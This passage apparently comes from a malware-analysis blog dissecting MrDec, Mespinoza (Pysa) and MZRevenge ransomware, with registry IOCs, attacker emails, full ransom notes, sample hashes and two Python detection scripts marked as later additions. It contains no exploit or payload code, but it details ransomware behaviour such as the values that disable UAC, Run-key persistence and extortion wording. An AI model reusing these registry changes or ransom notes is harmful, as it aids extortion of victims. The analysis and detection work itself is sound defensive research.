<span class="n">HKEY_CLASSES_ROOT</span><span class="err">\</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOBHpZYUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">_auto_file</span><span class="err">\</span><span class="n">shell</span><span class="err">\</span><span class="k">print</span><span class="err">\</span><span class="n">command</span><span class="w"> </span><span class="c1">--> %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1</span>
<span class="n">HKEY_CLASSES_ROOT</span><span class="err">\</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOBHpZYUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">_auto_file</span><span class="err">\</span><span class="n">shell</span><span class="err">\</span><span class="k">print</span><span class="err">\</span><span class="n">DropTarget</span><span class="w"> </span><span class="c1">--> {60fd46de-f830-4894-a628-6fa81bc0190d}</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Explorer</span><span class="err">\</span><span class="n">FileExts</span><span class="err">\</span><span class="p">.</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOBHpZYUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="err">\</span><span class="n">OpenWithList</span><span class="w"> </span><span class="c1">--> PhotoViewer.dll</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Explorer</span><span class="err">\</span><span class="n">FileExts</span><span class="err">\</span><span class="p">.</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOBHpZYUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="err">\</span><span class="n">OpenWithProgids</span><span class="w"> </span><span class="c1">--> ID]PFOBHpZYUnxnfV9F[ID]_auto_file</span>
</pre></div>
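<p>The registry keys listed above are worth turning into a check: as an added example (my own script, not part of the post or of any tool the post uses), the following Python reads a <code>reg export</code> text and flags the three artefact classes from the list, the UAC-weakening values under <code>Policies\System</code> (the same key the Mespinoza post below describes being modified), Run-key persistence that launches an .hta or a binary dropped straight into <code>C:\Windows</code>, and the <code>.[ID]...[ID]</code> extension registered under HKEY_CLASSES_ROOT. The export embedded in it is constructed from the IOC values above plus one benign Run entry.</p>

```python
"""Flag the registry artefacts from the MrDec IOC list in a .reg export.

Checks three things the IOCs above show: the UAC-weakening values written to
Policies\\System (EnableLUA, ConsentPromptBehaviorAdmin and PromptOnSecureDesktop
all set to 0), Run-key persistence that launches an .hta or a binary dropped
straight into the Windows directory, and the ".[ID]...[ID]" extension that MrDec
registers under HKEY_CLASSES_ROOT. Input is the text of a `reg export` (already
decoded from UTF-16).
"""
import re

UAC_KEY = r"\software\microsoft\windows\currentversion\policies\system"
RUN_KEY = r"\software\microsoft\windows\currentversion\run"
# Each of these values, when 0, removes one UAC protection.
UAC_ZERO_IS_BAD = {
    "EnableLUA": "UAC disabled entirely",
    "ConsentPromptBehaviorAdmin": "administrators elevate without any prompt",
    "PromptOnSecureDesktop": "elevation prompts no longer shown on the secure desktop",
}
MRDEC_EXT_RE = re.compile(r"^\.\[ID\][A-Za-z0-9]+\[ID\]$")
WINDIR_EXE_RE = re.compile(r"^[a-z]:\\windows\\[^\\]+\.exe$")
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')

# Constructed export: the MrDec IOC values from the list above plus one benign
# Run entry, in the format `reg export` produces.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"unlock"="c:\\Decoding help.hta"
"searchfiles"="C:\\windows\\searchfiles.exe"
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
"ConsentPromptBehaviorAdmin"=dword:00000000
"PromptOnSecureDesktop"=dword:00000000

[HKEY_CLASSES_ROOT\.[ID]PFOBHpZYUnxnfV9F[ID]]
@="[ID]PFOBHpZYUnxnfV9F[ID]_auto_file"
"""


def parse_reg(text):
    """Return [(key, value_name, data)]; data is an int for dword values, else a str."""
    entries, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if key is None or not m:
            continue
        name = "@" if m.group(2) else m.group(1)
        data = m.group(3)
        if data.startswith("dword:"):
            data = int(data[6:], 16)
        elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            # .reg string values escape backslashes and quotes with a backslash
            data = data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
        entries.append((key, name, data))
    return entries


def audit_entries(entries):
    """Return human-readable findings for the MrDec artefact classes."""
    findings = []
    for key, name, data in entries:
        k = key.lower()
        hive, _, path = key.partition("\\")
        if k.endswith(UAC_KEY) and name in UAC_ZERO_IS_BAD and data == 0:
            findings.append(f"UAC weakened: {name}=0 ({UAC_ZERO_IS_BAD[name]})")
        elif k.endswith(RUN_KEY):
            target = str(data).lower()
            if target.endswith(".hta"):
                findings.append(f"Run persistence '{name}' launches an HTA: {data}")
            elif WINDIR_EXE_RE.match(target):
                findings.append(f"Run persistence '{name}' runs a binary dropped into the Windows directory: {data}")
        elif hive == "HKEY_CLASSES_ROOT" and MRDEC_EXT_RE.match(path):
            findings.append(f"MrDec-style extension registered: {path} -> {data}")
    return findings


if __name__ == "__main__":
    for finding in audit_entries(parse_reg(SAMPLE_REG)) or ["no findings"]:
        print(finding)
```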
<h3>E-Mail Addresses</h3>
<div class="highlight"><pre><span></span><span class="k">First</span><span class="w"> </span><span class="n">campaign</span><span class="w"> </span><span class="p">(</span><span class="n">May</span><span class="w"> </span><span class="mi">2018</span><span class="p">)</span><span class="err">:</span><span class="w"></span>
<span class="n">shine1</span><span class="nv">@tutanota</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">shine2</span><span class="nv">@protonmail</span><span class="p">.</span><span class="n">com</span><span class="w"></span>
<span class="k">Second</span><span class="w"> </span><span class="n">campaign</span><span class="w"> </span><span class="p">(</span><span class="n">September</span><span class="o">/</span><span class="n">October</span><span class="w"> </span><span class="mi">2019</span><span class="p">)</span><span class="err">:</span><span class="w"></span>
<span class="n">JonStokton</span><span class="nv">@Protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">JonStokton</span><span class="nv">@tutanota</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">filessnoop</span><span class="nv">@aol</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">filessnoop</span><span class="nv">@tutanota</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">Third</span><span class="w"> </span><span class="nl">campaign</span><span class="p">:</span><span class="w"></span>
<span class="n">localgroup</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">localgroup</span><span class="nv">@tutanota</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">ZiCoyote</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">ZiCoyote</span><span class="nv">@aol</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">Fourth</span><span class="w"> </span><span class="nl">campaign</span><span class="p">:</span><span class="w"></span>
<span class="n">mr</span><span class="p">.</span><span class="k">dec</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">mr</span><span class="p">.</span><span class="k">dec</span><span class="nv">@tutanota</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">Frederik888</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">Frederik888</span><span class="nv">@aol</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
</pre></div>
<h3>Ransomnote V1</h3>
<div class="highlight"><pre><span></span><span class="nv">You</span> <span class="nv">are</span> <span class="nv">unlucky</span><span class="o">!</span> <span class="nv">The</span> <span class="nv">terrible</span> <span class="nv">virus</span> <span class="nv">has</span> <span class="nv">captured</span> <span class="nv">your</span> <span class="nv">files</span><span class="o">!</span> <span class="k">For</span> <span class="nv">decoding</span> <span class="nv">please</span> <span class="nv">contact</span> <span class="nv">by</span> <span class="nv">email</span> <span class="nv">Frederik888</span>@<span class="nv">aol</span>.<span class="nv">com</span> <span class="nv">or</span> <span class="nv">Frederik888</span>@<span class="nv">protonmail</span>.<span class="nv">com</span>
<span class="nv">Your</span>
[<span class="nv">ID</span>]<span class="nv">PFOBHpZYUnxnfV9F</span>[<span class="nv">ID</span>]
<span class="mi">1</span>. <span class="nv">In</span> <span class="nv">the</span> <span class="nv">subject</span> <span class="nv">line</span>, <span class="nv">write</span> <span class="nv">your</span> <span class="nv">ID</span>.
<span class="mi">2</span>. <span class="nv">Attach</span> <span class="mi">1</span><span class="o">-</span><span class="mi">2</span> <span class="nv">infected</span> <span class="nv">files</span> <span class="nv">that</span> <span class="k">do</span> <span class="nv">not</span> <span class="nv">contain</span> <span class="nv">important</span> <span class="nv">information</span> <span class="ss">(</span><span class="nv">less</span> <span class="nv">than</span> <span class="mi">2</span> <span class="nv">mb</span><span class="ss">)</span>
<span class="nv">are</span> <span class="nv">required</span> <span class="nv">to</span> <span class="nv">generate</span> <span class="nv">the</span> <span class="nv">decoder</span> <span class="nv">and</span> <span class="nv">restore</span> <span class="nv">the</span> <span class="nv">test</span> <span class="nv">file</span>.
<span class="nv">Hurry</span> <span class="nv">up</span><span class="o">!</span> <span class="nv">Time</span> <span class="nv">is</span> <span class="nv">limited</span><span class="o">!</span>
<span class="nv">Attention</span><span class="o">!!!</span>
<span class="nv">At</span> <span class="nv">the</span> <span class="k">end</span> <span class="nv">of</span> <span class="nv">this</span> <span class="nv">time</span>, <span class="nv">the</span> <span class="nv">private</span> <span class="nv">key</span> <span class="k">for</span> <span class="nv">generating</span> <span class="nv">the</span> <span class="nv">decoder</span> <span class="nv">will</span> <span class="nv">be</span> <span class="nv">destroyed</span>. <span class="nv">Files</span> <span class="nv">will</span> <span class="nv">not</span> <span class="nv">be</span> <span class="nv">restored</span><span class="o">!</span>
</pre></div>
<p></br></p>
<h2>Another one for the collection - Mespinoza (Pysa) Ransomware</h2>
<p>Published 2019-12-14 by f0wL</p>
<p>Back in October of 2019 the Mespinoza Ransomware family first surfaced via Malspam. On the 14th of December it returned with a new extension <em>.pysa</em>, so let's see if any changes have been made.</p><p>Fun Fact: The extension "pysa" is probably derived from the Zanzibari coin with the same name. Apparently it's quite popular with collectors. But enough of the pocket change, so let me put my two cents in on this sample :D </p>
<p><center><img alt="Logo" src="https://dissectingmalwa.re/img/pysa-coin.jpg"></center></p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>Mespinoza (.pysa) @ <a href="https://app.any.run/tasks/858e7e0f-59c5-4f58-b426-1cef39a05cbc/">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/a18c85399cd1ec3f1ec85cd66ff2e97a0dcf7ccb17ecf697a5376da8eda4d327/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/a18c85399cd1ec3f1ec85cd66ff2e97a0dcf7ccb17ecf697a5376da8eda4d327">HybridAnalysis</a>
--> <code>sha256 a18c85399cd1ec3f1ec85cd66ff2e97a0dcf7ccb17ecf697a5376da8eda4d327</code></p>
<p></br></p>
<p>As always, running Detect It Easy on the executable:</p>
<p><center><img alt="Logo" src="https://dissectingmalwa.re/img/pysa-die.png"></center></p>
<p></br></p>
<p>One of the first things it will do is modify the <code>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System</code> Registry Key to set the following values. Unfortunately I couldn't confirm this action in a sandbox with RegShot yet.</p>
<p><center><img alt="Anti Debugging" src="https://dissectingmalwa.re/img/pysa-reg.png"></center></p>
<p></br></p>
<p>To retain basic functions of the Operating System Mespinoza will spare certain directories related directly to Windows and critical files.</p>
<p><center><img alt="Skipping of select folders" src="https://dissectingmalwa.re/img/pysa-skip.png"></center></p>
<p></br></p>
<p>It will also specifically look for SQL related processes. I will have to confirm this with a debugger, but most of the time database processes are killed by Ransomware to disrupt the service and make the files available for encryption.</p>
<p><center><img alt="Looking for SQL related strings" src="https://dissectingmalwa.re/img/pysa-sql.png"></center></p>
<p></br></p>
<p>Of course Mespinoza won't stop with the system drive so it will check for connected removable media or shared network drives. <em>GetDriveTypeW</em> will tell it which type of media the selected device belongs to.</p>
<p><center><img alt="Checking for system drives" src="https://dissectingmalwa.re/img/pysa-drives1.png"></center></p>
<p><center><img alt="Determining the drive type" src="https://dissectingmalwa.re/img/pysa-drives2.png"></center></p>
<p></br></p>
<p>Up until now I have not seen a ransomware sample running <em>verclsid.exe</em>, so let's investigate: <em>{0B2C9183-C9FA-4C53-AE21-C900B0C39965}</em> corresponds to C:\Windows\system32\SearchFolder.dll and <em>{0C733A8A-2A1C-11CE-ADE5-00AA0044773D}</em> matches the CLSID of IDBProperties which is part of the Microsoft SQL Server.</p>
<div class="highlight"><pre><span></span><span class="k">C</span><span class="p">:</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">system32</span><span class="err">\</span><span class="n">verclsid</span><span class="p">.</span><span class="n">exe</span><span class="err">"</span> <span class="o">/</span><span class="n">S</span> <span class="o">/</span><span class="k">C</span> <span class="err">{</span><span class="mi">0</span><span class="n">B2C9183</span><span class="o">-</span><span class="n">C9FA</span><span class="o">-</span><span class="mi">4</span><span class="n">C53</span><span class="o">-</span><span class="n">AE21</span><span class="o">-</span><span class="n">C900B0C39965</span><span class="err">}</span> <span class="o">/</span><span class="n">I</span> <span class="err">{</span><span class="mi">0</span><span class="n">C733A8A</span><span class="o">-</span><span class="mi">2</span><span class="n">A1C</span><span class="o">-</span><span class="mi">11</span><span class="n">CE</span><span class="o">-</span><span class="n">ADE5</span><span class="o">-</span><span class="mi">00</span><span class="n">AA0044773D</span><span class="err">}</span> <span class="o">/</span><span class="n">X</span> <span class="mi">0</span><span class="n">x401</span>
</pre></div>
<p></br></p>
<p>After looking at a string dump I found a long hex string that is probably the key blob. I'll try to verify this with x32dbg later.</p>
<p></br></p>
<p>Turns out that the encrypted key is appended to the end of each file affected by the ransomware (which is a common tactic for some strains).</p>
<p><center><img alt="Appended and encrypted key" src="https://dissectingmalwa.re/img/pysa-file.png"></center></p>
<p>As this article is a work in progress I will update it as soon as I can. Since I have not seen the malware deleting the Volume Shadow Copies so far, one option for possible victims would be to run <a href="https://www.cgsecurity.org/wiki/PhotoRec">PhotoRec</a> or <a href="https://www.ccleaner.com/recuva">Recuva</a> to check for recoverable files.</p>
<p><br></p>
<h2><strong>Update 22.01.2020:</strong></h2>
<p>There's a new version of the Mespinoza / .pysa variant compiled on the 18th of January: </p>
<p>Mespinoza (.pysa) @ <a href="https://app.any.run/tasks/858e7e0f-59c5-4f58-b426-1cef39a05cbc/">AnyRun</a> --> <code>sha256 e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead</code></p>
<p><br></p>
<p>In the screenshot below you can see a comparison of the old sample (1.exe) and the new one (1.bin). Except for a few minor changes the two samples are mostly identical:</p>
<p><center><img alt="Appended and encrypted key" src="https://dissectingmalwa.re/img/mez-comp.png"></center></p>
<p>The public key used by the criminals is still the same (key blob located in the binary, converted from hex to raw).</p>
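<p>How an analyst can confirm that a hex or base64 blob pulled from a string dump really is an RSA public key blob, as an added example (not code from the original post, serving both the hex string found in the first sample and the key block above): a minimal DER walker for the X.509 SubjectPublicKeyInfo layout that the Mespinoza key starts with (30 82 02 20 30 0d ...). It only relies on the first 44 base64 characters of the blob quoted in the post; the 4096-bit test modulus is constructed here and is not the criminals' key.</p>

```python
"""Added example, not from the original post: is this blob an RSA SubjectPublicKeyInfo?"""
import base64

RSA_ENCRYPTION_OID = "1.2.840.113549.1.1.1"
# First 44 base64 characters (33 bytes) of the key blob quoted in the post; the
# DER starts 30 82 02 20 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 02 0d ...
PAGE_KEY_PREFIX = base64.b64decode("MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEA")
# Constructed 4096-bit test modulus, NOT the criminals' key.
CONSTRUCTED_MODULUS = (1 << 4095) | 0x10001

def need(cond, msg):
    if not cond:
        raise ValueError(msg)

def read_header(buf, pos):
    """DER tag and length at buf[pos]; the content need not be present, so this
    also works on a truncated string dump. Returns (tag, length, content_pos)."""
    need(pos + 2 <= len(buf), "truncated TLV header")
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low 7 bits give the number of length bytes
        n = length & 0x7F
        need(0 < n <= len(buf) - pos, "bad long-form length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, length, pos

def read_tlv(buf, pos, expect):
    """Strict variant: the tag must match and the content must fit. Returns (start, end)."""
    tag, length, start = read_header(buf, pos)
    need(tag == expect, f"expected tag 0x{expect:02x}, got 0x{tag:02x}")
    need(start + length <= len(buf), "TLV content runs past end of buffer")
    return start, start + length

def decode_oid(content):
    arcs, value = [content[0] // 40, content[0] % 40], 0
    for b in content[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(str(a) for a in arcs)

def parse_rsa_spki(der):
    """Walk SEQUENCE { SEQUENCE { OID, NULL }, BIT STRING { 0x00, SEQUENCE { n, e } } }."""
    outer_start, outer_end = read_tlv(der, 0, 0x30)
    alg_start, alg_end = read_tlv(der, outer_start, 0x30)
    oid_start, oid_end = read_tlv(der, alg_start, 0x06)
    oid = decode_oid(der[oid_start:oid_end])
    need(oid == RSA_ENCRYPTION_OID, f"algorithm {oid} is not rsaEncryption")
    bs_start, _ = read_tlv(der, alg_end, 0x03)
    need(der[bs_start] == 0, "BIT STRING must have zero unused bits")
    key_start, _ = read_tlv(der, bs_start + 1, 0x30)
    n_start, n_end = read_tlv(der, key_start, 0x02)
    e_start, e_end = read_tlv(der, n_end, 0x02)
    modulus = int.from_bytes(der[n_start:n_end], "big")
    exponent = int.from_bytes(der[e_start:e_end], "big")
    return {"oid": oid, "modulus_bits": modulus.bit_length(), "exponent": exponent, "der_len": outer_end}

def sniff_rsa_spki_prefix(prefix):
    """Best effort on a possibly truncated blob: report what the bytes allow and
    record where parsing stopped (string dumps often cut a blob short)."""
    info = {}
    try:
        tag, outer_len, p = read_header(prefix, 0)
        need(tag == 0x30, "outer element is not a SEQUENCE")
        info["outer_len"] = outer_len
        _, alg_len, alg_start = read_header(prefix, p)
        tag, oid_len, oid_start = read_header(prefix, alg_start)
        need(tag == 0x06 and oid_start + oid_len <= len(prefix), "algorithm OID missing")
        info["oid"] = decode_oid(prefix[oid_start:oid_start + oid_len])
        tag, _, p = read_header(prefix, alg_start + alg_len)  # BIT STRING
        need(tag == 0x03 and p < len(prefix) and prefix[p] == 0, "BIT STRING header missing")
        _, _, p = read_header(prefix, p + 1)                  # RSAPublicKey SEQUENCE
        tag, n_len, n_start = read_header(prefix, p)          # modulus INTEGER
        need(tag == 0x02 and n_start < len(prefix), "modulus INTEGER missing")
        pad = 1 if prefix[n_start] == 0 else 0  # leading 0x00 keeps the INTEGER positive
        info["modulus_bits"] = (n_len - pad) * 8
    except ValueError as err:
        info["stopped"] = str(err)
    return info

def der_len(n):
    b = n.to_bytes((n.bit_length() + 7) // 8 or 1, "big")
    return b if n < 0x80 else bytes([0x80 | len(b)]) + b

def tlv(tag, content):
    return bytes([tag]) + der_len(len(content)) + content

def der_int(v):
    b = v.to_bytes((v.bit_length() + 7) // 8 or 1, "big")
    return tlv(0x02, b"\x00" + b if b[0] & 0x80 else b)

def encode_rsa_spki(n, e):
    """Build a SubjectPublicKeyInfo so the parser can be exercised offline."""
    alg = tlv(0x30, bytes.fromhex("06092a864886f70d010101") + b"\x05\x00")
    key = tlv(0x30, der_int(n) + der_int(e))
    return tlv(0x30, alg + tlv(0x03, b"\x00" + key))
```

<p>On the 33-byte prefix from the post, sniff_rsa_spki_prefix reports an outer SEQUENCE of 544 bytes, the rsaEncryption OID and a 4096-bit modulus; parse_rsa_spki rejects the same prefix because the content is truncated.</p>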
<p><br></p>
<p>The Ransomnote contents stayed the same, except for the contact email addresses. Here are the contents of Readme.README: </p>
<div class="highlight"><pre><span></span><span class="nv">Hi</span> <span class="nv">Company</span>,
<span class="nv">Every</span> <span class="nv">byte</span> <span class="nv">on</span> <span class="nv">any</span> <span class="nv">types</span> <span class="nv">of</span> <span class="nv">your</span> <span class="nv">devices</span> <span class="nv">was</span> <span class="nv">encrypted</span>.
<span class="nv">Don</span><span class="s1">'</span><span class="s">t try to use backups because it were encrypted too.</span>
<span class="nv">To</span> <span class="nv">get</span> <span class="nv">all</span> <span class="nv">your</span> <span class="nv">data</span> <span class="nv">back</span> <span class="nv">contact</span> <span class="nv">us</span>:
<span class="nv">raingemaximo</span>@<span class="nv">protonmail</span>.<span class="nv">com</span>
<span class="nv">gareth</span>.<span class="nv">mckie3l</span>@<span class="nv">protonmail</span>.<span class="nv">com</span>
<span class="o">--------------</span>
<span class="nv">FAQ</span>:
<span class="mi">1</span>.
<span class="nv">Q</span>: <span class="nv">How</span> <span class="nv">can</span> <span class="nv">I</span> <span class="nv">make</span> <span class="nv">sure</span> <span class="nv">you</span> <span class="nv">don</span><span class="s1">'</span><span class="s">t fooling me?</span>
<span class="nv">A</span>: <span class="nv">You</span> <span class="nv">can</span> <span class="k">send</span> <span class="nv">us</span> <span class="mi">2</span> <span class="nv">files</span><span class="ss">(</span><span class="nv">max</span> <span class="mi">2</span><span class="nv">mb</span><span class="ss">)</span>.
<span class="mi">2</span>.
<span class="nv">Q</span>: <span class="nv">What</span> <span class="nv">to</span> <span class="k">do</span> <span class="nv">to</span> <span class="nv">get</span> <span class="nv">all</span> <span class="nv">data</span> <span class="nv">back</span>?
<span class="nv">A</span>: <span class="nv">Don</span><span class="s1">'</span><span class="s">t restart the computer, don</span><span class="s1">'</span><span class="nv">t</span> <span class="nv">move</span> <span class="nv">files</span> <span class="nv">and</span> <span class="nv">write</span> <span class="nv">us</span>.
<span class="mi">3</span>.
<span class="nv">Q</span>: <span class="nv">What</span> <span class="nv">to</span> <span class="nv">tell</span> <span class="nv">my</span> <span class="nv">boss</span>?
<span class="nv">A</span>: <span class="nv">Protect</span> <span class="nv">Your</span> <span class="nv">System</span> <span class="nv">Amigo</span>.
</pre></div>
<p></br></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1215</em> --> Kernel Modules and Extensions --> Persistence</p>
<p><em>T1045</em> --> Software Packing --> Defense Evasion</p>
<p><em>T1012</em> --> Query Registry --> Discovery</p>
<p><em>T1114</em> --> Email Collection --> Collection</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Mespinoza (pysa)</h3>
<div class="highlight"><pre><span></span><span class="mi">1</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: a18c85399cd1ec3f1ec85cd66ff2e97a0dcf7ccb17ecf697a5376da8eda4d327</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">12288</span><span class="p">:</span><span class="n">aVchT6oi</span><span class="o">+</span><span class="n">OeO</span><span class="o">+</span><span class="n">OeNhBBhhBBpiOTn5CjGGc4dXOsOjKf</span><span class="p">:</span><span class="n">aVc1Jiin5yGpMIj</span>
<span class="n">File</span> <span class="k">size</span><span class="p">:</span> <span class="mi">504</span><span class="p">.</span><span class="mi">50</span> <span class="n">KB</span>
</pre></div>
<h3>Associated Files</h3>
<div class="highlight"><pre><span></span><span class="n">Readme</span><span class="p">.</span><span class="n">README</span>
<span class="nf">%temp</span><span class="o">%</span><span class="err">\</span><span class="n">update</span><span class="p">.</span><span class="n">bat</span>
</pre></div>
<h3>E-Mail Addresses</h3>
<div class="highlight"><pre><span></span><span class="n">aireyeric</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">ellershaw</span><span class="p">.</span><span class="n">kiley</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">Used</span><span class="w"> </span><span class="ow">in</span><span class="w"> </span><span class="n">previous</span><span class="w"> </span><span class="nl">campaigns</span><span class="p">:</span><span class="w"></span>
<span class="n">mespinoza980</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">alanson_street8</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">lambchristoffer</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
</pre></div>
<h3>Ransomnote</h3>
<div class="highlight"><pre><span></span><span class="nv">Hi</span> <span class="nv">Company</span>,
<span class="nv">Every</span> <span class="nv">byte</span> <span class="nv">on</span> <span class="nv">any</span> <span class="nv">types</span> <span class="nv">of</span> <span class="nv">your</span> <span class="nv">devices</span> <span class="nv">was</span> <span class="nv">encrypted</span>.
<span class="nv">Don</span><span class="s1">'</span><span class="s">t try to use backups because it were encrypted too.</span>
<span class="nv">To</span> <span class="nv">get</span> <span class="nv">all</span> <span class="nv">your</span> <span class="nv">data</span> <span class="nv">back</span> <span class="nv">contact</span> <span class="nv">us</span>:
<span class="nv">aireyeric</span>@<span class="nv">protonmail</span>.<span class="nv">com</span>
<span class="nv">ellershaw</span>.<span class="nv">kiley</span>@<span class="nv">protonmail</span>.<span class="nv">com</span>
<span class="o">--------------</span>
<span class="nv">FAQ</span>:
<span class="mi">1</span>.
<span class="nv">Q</span>: <span class="nv">How</span> <span class="nv">can</span> <span class="nv">I</span> <span class="nv">make</span> <span class="nv">sure</span> <span class="nv">you</span> <span class="nv">don</span><span class="s1">'</span><span class="s">t fooling me?</span>
<span class="nv">A</span>: <span class="nv">You</span> <span class="nv">can</span> <span class="k">send</span> <span class="nv">us</span> <span class="mi">2</span> <span class="nv">files</span><span class="ss">(</span><span class="nv">max</span> <span class="mi">2</span><span class="nv">mb</span><span class="ss">)</span>.
<span class="mi">2</span>.
<span class="nv">Q</span>: <span class="nv">What</span> <span class="nv">to</span> <span class="k">do</span> <span class="nv">to</span> <span class="nv">get</span> <span class="nv">all</span> <span class="nv">data</span> <span class="nv">back</span>?
<span class="nv">A</span>: <span class="nv">Don</span><span class="s1">'</span><span class="s">t restart the computer, don</span><span class="s1">'</span><span class="nv">t</span> <span class="nv">move</span> <span class="nv">files</span> <span class="nv">and</span> <span class="nv">write</span> <span class="nv">us</span>.
<span class="mi">3</span>.
<span class="nv">Q</span>: <span class="nv">What</span> <span class="nv">to</span> <span class="nv">tell</span> <span class="nv">my</span> <span class="nv">boss</span>?
<span class="nv">A</span>: <span class="nv">Protect</span> <span class="nv">Your</span> <span class="nv">System</span> <span class="nv">Amigo</span>.
</pre></div>
<p></br></p>
<h2>A "Project.exe" that should have stayed in a drawer - MZRevenge / MaMo434376</h2>
<p>Published 2019-12-11 by f0wL</p>
<p>I first read about this strain on Twitter but it didn't seem like a big thing. Turns out I was wrong: in the last 3 days I collected over 35 samples :O</p><p><center><img alt="Header Image" src="https://dissectingmalwa.re/img/project-header.png"></center></p>
<p></br></p>
<p>Searching for "Project.exe" on AnyRun yields more than a healthy list of results all matching this strain.</p>
<p><center><img alt="Samples" src="https://dissectingmalwa.re/img/project-samples.png"></center></p>
<p></br></p>
<p>Oh would you look at that: Looks like we have a Borland Delphi application here</p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/project-die.png"></center></p>
<p></br></p>
<p>Yep, it's that ugly, so it definitely is Delphi :D And the criminals seem to have a very strong opinion about the Land of the Free but no arguments to back it up (since the rest of the form is empty).</p>
<p><center><img alt="Murica" src="https://dissectingmalwa.re/img/project-america.png"></center></p>
<p></br></p>
<p>The other strain uses a similar Form Window but actually displays its name in there (but they saved on the Window Title).</p>
<p><center><img alt="Mamo" src="https://dissectingmalwa.re/img/project-mamo.png"></center></p>
<p></br></p>
<p>MZ Revenge and MaMo add these extensions to encrypted files respectively: <em>.MZ173801</em> and <em>.MaMo434376</em>. It seems to drop the Ransomnotes into the Library Folders, once into %appdata%\Microsoft\Windows\Recent and into the root of every (unmounted) storage device.</p>
<p><center><img alt="Ransomnotes" src="https://dissectingmalwa.re/img/project-ransomnotes.png"></center></p>
<p></br></p>
<p>TIL: The <em>MZP</em> magic tells you that the PE was built in Pascal. Therefore the error message is different as well; normally you would expect to see <strong>This program cannot be run in DOS mode</strong> here. </p>
